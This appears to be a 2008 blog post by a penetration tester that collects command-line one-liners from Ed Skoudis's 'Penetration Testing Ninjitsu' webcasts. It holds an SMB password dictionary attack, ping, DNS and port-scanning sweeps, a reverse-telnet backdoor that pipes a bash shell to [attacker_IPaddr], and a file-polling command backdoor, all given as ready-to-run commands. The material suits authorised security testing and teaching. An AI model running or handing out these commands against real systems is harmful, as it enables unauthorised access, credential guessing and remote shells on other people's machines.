I’m now providing an updated Linux Penetration Testing Laptop Setup document to help install popular and useful vulnerability assessment tools for the Linux operating system. You can go and obtain Backtrack but I feel that you will have more understanding of the tools and Linux in general if you install the tools yourself. You will also have the most current version available. See Configuration Tutorials for the latest document.
Dec 022008
Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans). I highly recommend listening to these web casts and downloading the slides for your reference. I’m including the commands extracted from the slides that can be very useful for a penetration test.
Ninjitsu I
Ping Sweep
C:\> for /L %i in (1,1,255) do @ping –n 1 10.10.10.%i | find “Reply”
Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)
Ninjitsu II
Linux Command-Line Port Scanner
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]
Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Ninjitsu III
Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface “wireless network connection” disable & ping –n 3 127.0.0.1 >nul & netsh interface set interface “wireless network connection” enable & ping –n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)
Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"
Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"
Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI
List Domain Password Settings
C:\>net accounts /domain